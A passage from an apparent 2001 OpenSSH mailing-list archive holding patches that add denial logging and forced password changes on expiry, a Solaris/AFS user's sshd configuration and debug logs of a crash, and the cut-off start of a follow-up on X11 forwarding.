options.num_allow_users iff we break for loop */ ! if (i >= options.num_allow_users) return 0; } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ ! if (ga_init(pw->pw_name, pw->pw_gid) == 0) return 0; /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) --- 94,112 ---- if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ ! if (i >= options.num_allow_users) { ! log("User %.100s not allowed because not listed in AllowUsers", ! pw->pw_name); return 0; + } } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ ! if (ga_init(pw->pw_name, pw->pw_gid) == 0) { ! log("User %.100s not allowed because not in any group", ! pw->pw_name); return 0; + } /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) *************** *** 98,103 **** --- 113,120 ---- if (ga_match(options.deny_groups, options.num_deny_groups)) { ga_free(); + log("User %.100s not allowed because a group is listed in DenyGroups", + pw->pw_name); return 0; } /* *************** *** 108,113 **** --- 125,132 ---- if (!ga_match(options.allow_groups, options.num_allow_groups)) { ga_free(); + log("User %.100s not allowed because none of user's group are listed in AllowGroups", + pw->pw_name); return 0; } ga_free(); *** session.c.O Mon Jun 18 13:59:57 2001 --- session.c Mon Jun 18 14:15:29 2001 *************** *** 93,98 **** --- 93,99 ---- void session_close(Session *s); void do_exec_pty(Session *s, const char *command); void do_exec_no_pty(Session *s, const char *command); + void do_exec(Session *s, const char *command); void do_login(Session *s, const char *command); void do_child(Session *s, const char *command); void do_motd(void); *************** *** 270,286 **** command = NULL; packet_integrity_check(plen, 0, type); } ! if (forced_command != NULL) { ! original_command = command; ! command = forced_command; ! debug("Forced command '%.500s'", forced_command); ! } ! if (s->ttyfd != -1) ! do_exec_pty(s, command); ! else ! do_exec_no_pty(s, command); ! if (command != NULL) ! xfree(command); session_close(s); return; --- 271,277 ---- command = NULL; packet_integrity_check(plen, 0, type); } ! do_exec(s, command); session_close(s); return; *************** *** 504,509 **** --- 495,529 ---- } } + /* + * This is called to fork and execute a command. If another command is + * to be forced, execute that instead. + */ + void + do_exec(Session *s, const char *command) + { + if (forced_command) { + original_command = command; + command = forced_command; + forced_command = NULL; + debug("Forced command '%.900s'", command); + } + + if (s->ttyfd != -1) + do_exec_pty(s, command); + else + do_exec_no_pty(s, command); + + if (command != NULL) + xfree(command); + + if (original_command != NULL) { + xfree(original_command); + original_command = NULL; + } + } + + /* administrative, login(1)-like work */ void do_login(Session *s, const char *command) *************** *** 1288,1300 **** int session_shell_req(Session *s) { - /* if forced_command == NULL, the shell is execed */ - char *shell = forced_command; packet_done(); ! if (s->ttyfd == -1) ! do_exec_no_pty(s, shell); ! else ! do_exec_pty(s, shell); return 1; } --- 1308,1315 ---- int session_shell_req(Session *s) { packet_done(); ! do_exec(s, NULL); return 1; } *************** *** 1304,1320 **** u_int len; char *command = packet_get_string(&len); packet_done(); ! if (forced_command) { ! original_command = command; ! command = forced_command; ! debug("Forced command '%.500s'", forced_command); ! } ! if (s->ttyfd == -1) ! do_exec_no_pty(s, command); ! else ! do_exec_pty(s, command); ! if (forced_command == NULL) ! xfree(command); return 1; } --- 1319,1325 ---- u_int len; char *command = packet_get_string(&len); packet_done(); ! do_exec(s, command); return 1; } -------------- next part -------------- *** auth.c.O2 Mon Jun 18 14:21:06 2001 --- auth.c Mon Jun 18 14:24:33 2001 *************** *** 47,52 **** --- 47,55 ---- #include "buffer.h" #include "bufaux.h" + /* set when password has expired */ + int forced_passwd_change = 0; + /* import */ extern ServerOptions options; *************** *** 81,93 **** int days = time(NULL) / 86400; /* Check account expiry */ ! if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) return 0; /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && ! (days > (spw->sp_lstchg + spw->sp_max))) ! return 0; } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ --- 84,106 ---- int days = time(NULL) / 86400; /* Check account expiry */ ! if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) { ! log("User %.100s not allowed because account expired", ! pw->pw_name); return 0; + } /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && ! (days > (spw->sp_lstchg + spw->sp_max))) { ! if ((pw->pw_uid == 0)) { ! log("User %.100s not allowed because password expired", ! pw->pw_name); ! return 0; ! } ! ! forced_passwd_change = 1; ! } } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ *************** *** 177,183 **** } /* Remove trailing newline */ *--p = '\0'; ! log("Login restricted for %s: %.100s", pw->pw_name, loginmsg); } return 0; } --- 190,196 ---- } /* Remove trailing newline */ *--p = '\0'; ! log("Login restricted for %.100s: %.100s", pw->pw_name, loginmsg); } return 0; } *** auth.h.O Tue Jun 5 15:25:06 2001 --- auth.h Mon Jun 18 14:28:04 2001 *************** *** 35,40 **** --- 35,43 ---- #include #endif + /* set when password has expired */ + extern int forced_passwd_change; + typedef struct Authctxt Authctxt; typedef struct KbdintDevice KbdintDevice; *** session.c.O2 Mon Jun 18 14:21:15 2001 --- session.c Mon Jun 18 14:39:36 2001 *************** *** 603,608 **** --- 603,636 ---- debug("Forced command '%.900s'", command); } + if (forced_passwd_change) { + char *user = s->pw->pw_name; + char *msg; + + if (command != NULL) + xfree(command); + + if (s->ttyfd != -1) { + msg = "Password for %.100s has expired, running 'passwd' to reset it"; + /* + * Can't pass "user" to 'passwd' because Linux doesn't + * allow it. + * Also, the prompt is friendlier without "user". + */ + command = xstrdup(PASSWD_PATH); + } else { + msg = "Password for %.100s has expired and cannot be changed without a pty"; + /* + * Without a pty, Solaris 'passwd' prints "Permission + * denied", but Linux attempts to change the password + * and fails miserably, so echo an error message instead + */ + command = xstrdup("/bin/sh -c 'echo Permission denied >&2; exit 1'"); + } + log(msg, user); + packet_send_debug(msg, user); + } + if (s->ttyfd != -1) do_exec_pty(s, command); else *** configure.in.O Sun Jun 10 12:24:52 2001 --- configure.in Mon Jun 18 14:27:23 2001 *************** *** 1304,1309 **** --- 1304,1313 ---- AC_DEFINE_UNQUOTED(RSH_PATH, "$rsh_path") fi + AC_PATH_PROG(PASSWD_PATH, passwd) + AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") + + # Check for mail directory (last resort if we cannot get it from headers) if test ! -z "$MAIL" ; then maildir=`dirname $MAIL` *** acconfig.h.O Tue May 8 15:33:06 2001 --- acconfig.h Mon Jun 18 14:30:16 2001 *************** *** 211,216 **** --- 211,219 ---- /* Define if rsh is found in your path */ #undef RSH_PATH + /* Define if passwd is found in your path */ + #undef PASSWD_PATH + /* Define if you want to allow MD5 passwords */ #undef HAVE_MD5_PASSWORDS -------------- next part -------------- *** auth.c.O Mon Jun 18 14:50:25 2001 --- auth.c Mon Jun 18 14:50:29 2001 *************** *** 41,46 **** --- 41,49 ---- #include "auth-options.h" #include "canohost.h" + /* set when password has expired */ + int forced_passwd_change = 0; + /* import */ extern ServerOptions options; *************** *** 75,87 **** int days = time(NULL) / 86400; /* Check account expiry */ ! if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) return 0; /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && ! (days > (spw->sp_lstchg + spw->sp_max))) ! return 0; } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ --- 78,100 ---- int days = time(NULL) / 86400; /* Check account expiry */ ! if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) { ! log("User %.100s not allowed because account expired", ! pw->pw_name); return 0; + } /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && ! (days > (spw->sp_lstchg + spw->sp_max))) { ! if ((pw->pw_uid == 0)) { ! log("User %.100s not allowed because password expired", ! pw->pw_name); ! return 0; ! } ! ! forced_passwd_change = 1; ! } } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ *************** *** 96,111 **** shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ ! if (stat(shell, &st) != 0) return 0; ! if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) return 0; /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) ! if (match_pattern(pw->pw_name, options.deny_users[i])) return 0; } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { --- 109,133 ---- shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ ! if (stat(shell, &st) != 0) { ! log("User %.100s not allowed because shell %.100s does not exist", ! pw->pw_name, shell); return 0; ! } ! if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) { ! log("User %.100s not allowed because shell %.100s is not executable", ! pw->pw_name, shell); return 0; + } /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) ! if (match_pattern(pw->pw_name, options.deny_users[i])) { ! log("User %.100s not allowed because listed in DenyUsers", ! pw->pw_name); return 0; + } } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { *************** *** 113,125 **** if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ ! if (i >= options.num_allow_users) return 0; } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ ! if (ga_init(pw->pw_name, pw->pw_gid) == 0) return 0; /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) --- 135,153 ---- if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ ! if (i >= options.num_allow_users) { ! log("User %.100s not allowed because not listed in AllowUsers", ! pw->pw_name); return 0; + } } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ ! if (ga_init(pw->pw_name, pw->pw_gid) == 0) { ! log("User %.100s not allowed because not in any group", ! pw->pw_name); return 0; + } /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) *************** *** 126,131 **** --- 154,161 ---- if (ga_match(options.deny_groups, options.num_deny_groups)) { ga_free(); + log("User %.100s not allowed because a group is listed in DenyGroups", + pw->pw_name); return 0; } /* *************** *** 136,141 **** --- 166,173 ---- if (!ga_match(options.allow_groups, options.num_allow_groups)) { ga_free(); + log("User %.100s not allowed because none of user's group are listed in AllowGroups", + pw->pw_name); return 0; } ga_free(); *************** *** 152,158 **** } /* Remove trailing newline */ *--p = '\0'; ! log("Login restricted for %s: %.100s", pw->pw_name, loginmsg); } return 0; } --- 184,190 ---- } /* Remove trailing newline */ *--p = '\0'; ! log("Login restricted for %.100s: %.100s", pw->pw_name, loginmsg); } return 0; } *** auth.h.O Mon Jun 18 14:50:25 2001 --- auth.h Mon Jun 18 14:50:29 2001 *************** *** 35,40 **** --- 35,43 ---- #include #endif + /* set when password has expired */ + extern int forced_passwd_change; + typedef struct Authctxt Authctxt; struct Authctxt { int success; *** session.c.O Mon Jun 18 14:50:25 2001 --- session.c Mon Jun 18 14:50:29 2001 *************** *** 126,131 **** --- 126,132 ---- void session_proctitle(Session *s); void do_exec_pty(Session *s, const char *command); void do_exec_no_pty(Session *s, const char *command); + void do_exec(Session *s, const char *command); void do_login(Session *s, const char *command); #ifdef LOGIN_NEEDS_UTMPX void do_pre_login(Session *s); *************** *** 394,411 **** command = NULL; packet_integrity_check(plen, 0, type); } ! if (forced_command != NULL) { ! original_command = command; ! command = forced_command; ! debug("Forced command '%.500s'", forced_command); ! } ! if (have_pty) ! do_exec_pty(s, command); ! else ! do_exec_no_pty(s, command); ! ! if (command != NULL) ! xfree(command); return; default: --- 395,401 ---- command = NULL; packet_integrity_check(plen, 0, type); } ! do_exec(s, command); return; default: *************** *** 680,685 **** --- 670,732 ---- } #endif + /* + * This is called to fork and execute a command. If another command is + * to be forced, execute that instead. + */ + void + do_exec(Session *s, const char *command) + { + if (forced_command) { + original_command = command; + command = forced_command; + forced_command = NULL; + debug("Forced command '%.900s'", command); + } + + if (forced_passwd_change) { + char *user = s->pw->pw_name; + char *msg; + + if (command != NULL) + xfree(command); + + if (s->ttyfd != -1) { + msg = "Password for %.100s has expired, running 'passwd' to reset it"; + /* + * Can't pass "user" to 'passwd' because Linux doesn't + * allow it. + * Also, the prompt is friendlier without "user". + */ + command = xstrdup(PASSWD_PATH); + } else { + msg = "Password for %.100s has expired and cannot be changed without a pty"; + /* + * Without a pty, Solaris 'passwd' prints "Permission + * denied", but Linux attempts to change the password + * and fails miserably, so echo an error message instead + */ + command = xstrdup("/bin/sh -c 'echo Permission denied >&2; exit 1'"); + } + log(msg, user); + packet_send_debug(msg, user); + } + + if (s->ttyfd != -1) + do_exec_pty(s, command); + else + do_exec_no_pty(s, command); + + if (command != NULL) + xfree(command); + + if (original_command != NULL) { + xfree(original_command); + original_command = NULL; + } + } + + /* administrative, login(1)-like work */ void do_login(Session *s, const char *command) *************** *** 1737,1749 **** int session_shell_req(Session *s) { - /* if forced_command == NULL, the shell is execed */ - char *shell = forced_command; packet_done(); ! if (s->ttyfd == -1) ! do_exec_no_pty(s, shell); ! else ! do_exec_pty(s, shell); return 1; } --- 1784,1791 ---- int session_shell_req(Session *s) { packet_done(); ! do_exec(s, NULL); return 1; } *************** *** 1753,1769 **** u_int len; char *command = packet_get_string(&len); packet_done(); ! if (forced_command) { ! original_command = command; ! command = forced_command; ! debug("Forced command '%.500s'", forced_command); ! } ! if (s->ttyfd == -1) ! do_exec_no_pty(s, command); ! else ! do_exec_pty(s, command); ! if (forced_command == NULL) ! xfree(command); return 1; } --- 1795,1801 ---- u_int len; char *command = packet_get_string(&len); packet_done(); ! do_exec(s, command); return 1; } *** configure.in.O Mon Jun 18 14:50:25 2001 --- configure.in Mon Jun 18 14:50:29 2001 *************** *** 1302,1307 **** --- 1302,1311 ---- AC_DEFINE_UNQUOTED(RSH_PATH, "$rsh_path") fi + AC_PATH_PROG(PASSWD_PATH, passwd) + AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") + + # Check for mail directory (last resort if we cannot get it from headers) if test ! -z "$MAIL" ; then maildir=`dirname $MAIL` *** acconfig.h.O Mon Jun 18 14:50:25 2001 --- acconfig.h Mon Jun 18 14:50:31 2001 *************** *** 211,216 **** --- 211,219 ---- /* Define if rsh is found in your path */ #undef RSH_PATH + /* Define if passwd is found in your path */ + #undef PASSWD_PATH + /* Define if you want to allow MD5 passwords */ #undef HAVE_MD5_PASSWORDS From Ernst.Boetsch at lrz-muenchen.de Tue Jun 19 07:56:25 2001 From: Ernst.Boetsch at lrz-muenchen.de (Ernst Boetsch) Date: Mon, 18 Jun 2001 23:56:25 +0200 Subject: OpenSSH + Solaris + AFS ??? Message-ID: <20010618235625.A21297@wsc33.lrz-muenchen.de> Hello *, sorry if i missed an article which already solves my problem. I need a working configuration of OpenSSH for Solaris 7 (SunOS 5.7) with AFS support. PAM support to use the AFS PAm module `pam_afs.so' and TCP-Wrapper support would be nice. It would be nice to have similar configurations for Solaris 6 (SunOS 5.6), Solaris 8 (SunOS 5.8) and Solaris 2.5.1. I have tested a few configurations but none worked. The last one was: * openssh-2.9p1, krb4-1.0.8, openssl-0.9.6a, zlib-1.1.3, AFS 3.5 (?), cc (Sun WorkShop 6 update 1), SunOS 5.7 * Static libraries of `krb4-1.0.8' and `openssl-0.9.6a' * OpenSSH has been configured with the following options: User binaries: /sw/sun4_57/Security/openssh-2.9p1 System binaries: /sw/sun4_57/Security/openssh-2.9p1 Configuration files: /usr/local/etc/openssh Askpass program: /sw/sun4_57/Security/openssh-2.9p1/ssh-askpass Manual pages: /sw/sun4_57/Security/openssh-2.9p1/man/manX PID file: /usr/local/etc/openssh sshd default user PATH: /usr/bin:/usr/ucb:/usr/local/bin:/client/bin Random number collection: Builtin (timeout 200) Manpage format: man PAM support: yes KerberosIV support: yes AFS support: yes S/KEY support: no TCP Wrappers support: yes MD5 password support: no IP address in $DISPLAY hack: no Use IPv4 by default hack: yes Translate v4 in v6 hack: no Host: sparc-sun-solaris2.7 Compiler: /opt/SUNWspro.6/bin/cc Compiler flags: -g Preprocessor flags: -I/client/include -I/client/include -I/usr/local/include -I/usr/afsws/include Linker flags: -R/client/lib -L/client/lib -z muldefs -L/client/lib -R/client/lib -L/usr/local/lib -R/usr/local/lib -L/usr/afsws/lib Libraries: -lkafs -lresolv -ldes -lkrb -lpam -ldl -lwrap -lz -lsocket -lnsl -lgen -lcrypto -ldes * /etc/pam.conf: sshd auth sufficient /usr/lib/security/pam_afs.so ignore_root sshd auth required /usr/lib/security/pam_unix.so try_first_pass debug sshd account sufficient /usr/lib/security/pam_afs.so.1 ignore_root sshd account required /usr/lib/security/pam_unix.so.1 try_first_pass debug other session required /usr/lib/security/pam_unix.so.1 * tcpd/allow: sshd:.lrz-muenchen.de:rfc931 sshdfwd-X11:.lrz-muenchen.de:rfc931 * sshd.cf: Port 222 ListenAddress 0.0.0.0 HostKey /usr/local/etc/openssh/host_key ServerKeyBits 768 LoginGraceTime 600 KeyRegenerationInterval 3600 PermitRootLogin yes IgnoreRhosts no StrictModes yes X11Forwarding yes X11DisplayOffset 10 PrintMotd yes KeepAlive yes SyslogFacility AUTH RhostsAuthentication no RhostsRSAAuthentication yes RSAAuthentication yes PasswordAuthentication yes PermitEmptyPasswords yes UseLogin no KerberosAuthentication yes KerberosOrLocalPasswd no KerberosTgtPassing yes AFSTokenPassing yes KerberosTicketCleanup yes XAuthLocation /usr/openwin/bin/xauth * Log of `ssh -v -p 222 suntest2' and `sshd -d -d -d' if `.shosts' permits login without password as attachements (files `ssh.log.with-shosts' and `sshd.log.with-shosts') * Log of `ssh -v -p 222 suntest2' and `sshd -d -d -d' if `.shosts' does not permit login without password as attachements (files `ssh.log.without-shosts' and `sshd.log.without-shosts') Do you need any other information? Any hints are appreciated very much. Thank You for Your cooperation. Kind regards, Ernst Boetsch -- ******************************************************************* Ernst N. Boetsch | Leibniz Computer Center | of the Bavarian Academy Email: Ernst.Boetsch at lrz-muenchen.de | of Sciences Phone: +49 89 289-28831 (/-28784) | Barer Strasse 21 Fax: +49 89 2809460 | D-80333 Muenchen, Germany -------------- next part -------------- $ ssh -v -p 222 suntest2 SSH Version 1.2.27 (AFS/KRB.p1, LRZ) [sparc-sun-solaris2.5.1], protocol version 1.5. Standard version. Does not use RSAREF. wsc33: Reading configuration data /afs/lrz/home/a/a2822ab/.ssh/config wsc33: Applying options for * wsc33: Reading configuration data /usr/local/etc/ssh/config wsc33: Applying options for * wsc33: ssh_connect: getuid 10416 geteuid 0 anon 0 wsc33: Connecting to suntest2 [129.187.10.13] port 222. wsc33: Allocated local port 1013. wsc33: Connection established. wsc33: Remote protocol version 1.5, remote software version OpenSSH_2.9p1 (LRZ) wsc33: Waiting for server public key. wsc33: Received server public key (768 bits) and host key (1024 bits). wsc33: Host 'suntest2' is known and matches the host key. wsc33: Initializing random; seed file /afs/lrz/home/a/a2822ab/.ssh/random_seed wsc33: Encryption type: blowfish wsc33: Sent encrypted session key. wsc33: Installing crc compensation attack detector. wsc33: Received encrypted confirmation. wsc33: Remote: AFS token accepted (afs at lrz-muenchen.de, AFS ID 10416 at lrz-muenchen.de) wsc33: Trying rhosts or /etc/hosts.equiv with RSA host authentication. wsc33: Remote: Accepted by .ssh/shosts. wsc33: Received RSA challenge for host key from server. wsc33: Sending response to host key RSA challenge. wsc33: Remote: Rhosts with RSA host authentication accepted. wsc33: Rhosts or /etc/hosts.equiv with RSA host authentication accepted by server. wsc33: Requesting pty. wsc33: Requesting X11 forwarding with authentication spoofing. wsc33: Requesting shell. wsc33: Entering interactive session. Last login: Mon Jun 18 23:30:31 2001 from wsc33.lrz-muenc Sun Microsystems Inc. SunOS 5.7 Generic October 1998 debug1: PAM establishing creds Command terminated on signal 11. -------------- next part -------------- debug3: Reading output from 'ls -alni /var/log' debug3: Time elapsed: 23 msec debug3: Got 1.93 bytes of entropy from 'ls -alni /var/log' [...] debug3: Reading output from 'tail -200 /var/adm/messages' debug3: Time elapsed: 14 msec debug3: Got 0.34 bytes of entropy from 'tail -200 /var/adm/messages' debug1: Seeded RNG with 36 bytes from programs debug1: Seeded RNG with 3 bytes from system calls debug1: sshd version OpenSSH_2.9p1 (LRZ) debug1: private host key: #0 type 0 RSA1 Disabling protocol version 2. Could not load host key debug1: Bind to port 222 on 0.0.0.0. Server listening on 0.0.0.0 port 222. Generating 768 bit RSA key. RSA key generation complete. debug1: Server will not fork when running in debugging mode. Connection from 129.187.10.85 port 1013 debug1: Client protocol version 1.5; client software version 1.2.27 (AFS/KRB.p1, LRZ) debug1: no match: 1.2.27 (AFS/KRB.p1, LRZ) debug1: Local version string SSH-1.5-OpenSSH_2.9p1 (LRZ) debug1: Sent 768 bit server key and 1024 bit host key. debug1: Encryption type: blowfish debug1: Received session key; encryption turned on. debug1: Installing crc compensation attack detector. debug1: Starting up PAM with username "a2822ab" debug3: Trying to reverse map address 129.187.10.85. debug1: PAM setting rhost to "wsc33.lrz-muenchen.de" debug1: Attempting authentication for a2822ab. debug1: Trying rhosts with RSA host authentication for client user a2822ab debug2: auth_rhosts2: clientuser a2822ab hostname wsc33.lrz-muenchen.de ipaddr 129.187.10.85 debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: Rhosts RSA authentication: canonical host wsc33.lrz-muenchen.de debug3: check_host_in_hostfile: filename /usr/local/etc/openssh/known_hosts debug3: check_host_in_hostfile: match line 260 Rhosts with RSA host authentication accepted for a2822ab, a2822ab on wsc33.lrz-muenchen.de. debug1: PAM setting ruser to "a2822ab" Accepted rhosts-rsa for a2822ab from 129.187.10.85 port 1013 ruser a2822ab debug1: session_new: init debug1: session_new: session 0 debug1: Allocating pty. debug2: tty_parse_modes: ospeed 9600 debug2: tty_parse_modes: ispeed 9600 debug2: tty_parse_modes: 1 3 [...] debug2: tty_parse_modes: 2 28 debug2: tty_parse_modes: 93 0 debug1: Received request for X11 forwarding with auth spoofing. debug2: SSH_PROTOFLAG_SCREEN_NUMBER: 1 debug1: bind port 6010: Address already in use debug1: bind port 6011: Address already in use debug1: fd 11 setting O_NONBLOCK debug1: fd 11 IS O_NONBLOCK debug1: channel 0: new [X11 inet listener] debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: PAM setting tty to "/dev/pts/10" debug1: PAM establishing creds debug1: Entering interactive session. debug1: fd 6 setting O_NONBLOCK debug1: fd 10 IS O_NONBLOCK debug1: server_init_dispatch_13 debug1: server_init_dispatch_15 debug3: tvp!=NULL kid 0 mili 10 debug3: tvp!=NULL kid 0 mili 10 debug3: tvp!=NULL kid 0 mili 10 debug1: End of interactive session; stdin 0, stdout (read 155, sent 155), stderr 0 bytes. debug1: channel_free: channel 0: status: The following connections are open: debug1: Received SIGCHLD. Disconnecting: Command terminated on signal 11. debug1: Calling cleanup 0x52040(0x0) debug1: xauthfile_cleanup_proc called debug1: Calling cleanup 0x60450(0x0) debug1: Calling cleanup 0x520f8(0x179318) debug1: pty_cleanup_proc: /dev/pts/10 debug1: Calling cleanup 0x47bd0(0x0) debug1: Cannot delete credentials[7]: Permission denied debug1: Calling cleanup 0x6fff8(0x0) debug1: Calling cleanup 0x7b100(0x0) debug1: writing PRNG seed to file //.ssh/prng_seed -------------- next part -------------- $ ssh -v -p 222 suntest2 SSH Version 1.2.27 (AFS/KRB.p1, LRZ) [sparc-sun-solaris2.5.1], protocol version 1.5. Standard version. Does not use RSAREF. wsc33: Reading configuration data /afs/lrz/home/a/a2822ab/.ssh/config wsc33: Applying options for * wsc33: Reading configuration data /usr/local/etc/ssh/config wsc33: Applying options for * wsc33: ssh_connect: getuid 10416 geteuid 0 anon 0 wsc33: Connecting to suntest2 [129.187.10.13] port 222. wsc33: Allocated local port 1013. wsc33: Connection established. wsc33: Remote protocol version 1.5, remote software version OpenSSH_2.9p1 (LRZ) wsc33: Waiting for server public key. wsc33: Received server public key (768 bits) and host key (1024 bits). wsc33: Host 'suntest2' is known and matches the host key. wsc33: Initializing random; seed file /afs/lrz/home/a/a2822ab/.ssh/random_seed wsc33: Encryption type: blowfish wsc33: Sent encrypted session key. wsc33: Installing crc compensation attack detector. wsc33: Received encrypted confirmation. wsc33: Remote: AFS token accepted (afs at lrz-muenchen.de, AFS ID 10416 at lrz-muenchen.de) wsc33: Trying rhosts or /etc/hosts.equiv with RSA host authentication. wsc33: Server refused our rhosts authentication or host key. wsc33: No agent. wsc33: Doing password authentication. a2822ab at suntest2's password: wsc33: Requesting pty. wsc33: Requesting X11 forwarding with authentication spoofing. wsc33: Requesting shell. wsc33: Entering interactive session. Last login: Mon Jun 18 23:39:13 2001 from wsc33.lrz-muenc Sun Microsystems Inc. SunOS 5.7 Generic October 1998 debug1: PAM establishing creds Command terminated on signal 11. -------------- next part -------------- debug3: Reading output from 'ls -alni /var/log' debug3: Time elapsed: 23 msec debug3: Got 1.93 bytes of entropy from 'ls -alni /var/log' [...] debug3: Reading output from 'tail -200 /var/adm/messages' debug3: Time elapsed: 14 msec debug3: Got 0.44 bytes of entropy from 'tail -200 /var/adm/messages' debug1: Seeded RNG with 36 bytes from programs debug1: Seeded RNG with 3 bytes from system calls debug1: sshd version OpenSSH_2.9p1 (LRZ) debug1: private host key: #0 type 0 RSA1 Disabling protocol version 2. Could not load host key debug1: Bind to port 222 on 0.0.0.0. Server listening on 0.0.0.0 port 222. Generating 768 bit RSA key. RSA key generation complete. debug1: Server will not fork when running in debugging mode. Connection from 129.187.10.85 port 1013 debug1: Client protocol version 1.5; client software version 1.2.27 (AFS/KRB.p1, LRZ) debug1: no match: 1.2.27 (AFS/KRB.p1, LRZ) debug1: Local version string SSH-1.5-OpenSSH_2.9p1 (LRZ) debug1: Sent 768 bit server key and 1024 bit host key. debug1: Encryption type: blowfish debug1: Received session key; encryption turned on. debug1: Installing crc compensation attack detector. debug1: Starting up PAM with username "a2822ab" debug3: Trying to reverse map address 129.187.10.85. debug1: PAM setting rhost to "wsc33.lrz-muenchen.de" debug1: Attempting authentication for a2822ab. debug1: Trying rhosts with RSA host authentication for client user a2822ab debug2: auth_rhosts2: clientuser a2822ab hostname wsc33.lrz-muenchen.de ipaddr 129.187.10.85 debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid Failed rhosts-rsa for a2822ab from 129.187.10.85 port 1013 ruser a2822ab debug1: writing PRNG seed to file //.ssh/prng_seed debug1: PAM Password authentication accepted for user "a2822ab" Accepted password for a2822ab from 129.187.10.85 port 1013 debug1: session_new: init debug1: session_new: session 0 debug1: Allocating pty. debug2: tty_parse_modes: ospeed 9600 debug2: tty_parse_modes: ispeed 9600 debug2: tty_parse_modes: 1 3 [...] debug2: tty_parse_modes: 93 0 debug1: Received request for X11 forwarding with auth spoofing. debug2: SSH_PROTOFLAG_SCREEN_NUMBER: 1 debug1: bind port 6010: Address already in use debug1: bind port 6011: Address already in use debug1: fd 11 setting O_NONBLOCK debug1: fd 11 IS O_NONBLOCK debug1: channel 0: new [X11 inet listener] debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: PAM setting tty to "/dev/pts/10" debug1: PAM establishing creds debug1: Entering interactive session. debug1: fd 6 setting O_NONBLOCK debug1: fd 10 IS O_NONBLOCK debug1: server_init_dispatch_13 debug1: server_init_dispatch_15 debug3: tvp!=NULL kid 0 mili 10 debug3: tvp!=NULL kid 0 mili 10 debug3: tvp!=NULL kid 0 mili 10 debug1: End of interactive session; stdin 0, stdout (read 155, sent 155), stderr 0 bytes. debug1: channel_free: channel 0: status: The following connections are open: debug1: Received SIGCHLD. Disconnecting: Command terminated on signal 11. debug1: Calling cleanup 0x52040(0x0) debug1: xauthfile_cleanup_proc called debug1: Calling cleanup 0x60450(0x0) debug1: Calling cleanup 0x520f8(0x179318) debug1: pty_cleanup_proc: /dev/pts/10 debug1: Calling cleanup 0x47bd0(0x0) debug1: Cannot delete credentials[7]: Permission denied debug1: Calling cleanup 0x6fff8(0x0) debug1: Calling cleanup 0x7b100(0x0) debug1: writing PRNG seed to file //.ssh/prng_seed From acox at ia.primustel.com Tue Jun 19 09:05:10 2001 From: acox at ia.primustel.com (Aran Cox) Date: Mon, 18 Jun 2001 18:05:10 -0500 Subject: 2.9p1 SCO OS 5.0.5 server and Linux client hang on exit when using X11 forwarding and protocol 2 In-Reply-To: <20010613163006.A1374@benway.cv.telegroup.com>; from acox@ia.primustel.com on Wed, Jun 13, 2001 at 04:30:06PM -0500 References: <20010613163006.A1374@benway.cv.telegroup.com> Message-ID: <20010618180510.A31297@benway.cv.telegroup.com> Well, I almost solved my problem but caused another. I downloaded todays snapshot and compiled that for linux. Now no X applications make it back: Xlib: connection to "cvcdr1b.cv.telegroup.com:10.0" refused by server Xlib: Invalid MIT-MAGIC-COOKIE-1 key Error: Can't open display: cvcdr1b.cv.telegroup.com:10.0 If I do an xhost +localhost, everything works perfectly. But I don't really want to do an xhost +localhost on my machine, and I didn't have to before. Any suggestions? On Wed, Jun 13, 2001 at 04:30:06PM -0500, Aran Cox wrote: > When I run this command: > > ssh -1 -v -n -l root njdb1b /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc > > An xterm appears on my screen, the contents of /etc scroll by and then ssh exits. > > When I invoke the same command with the -2 option, the xterm appears (and disappears) but > ssh never exits. netstat says the (ssh) connection is still established but the 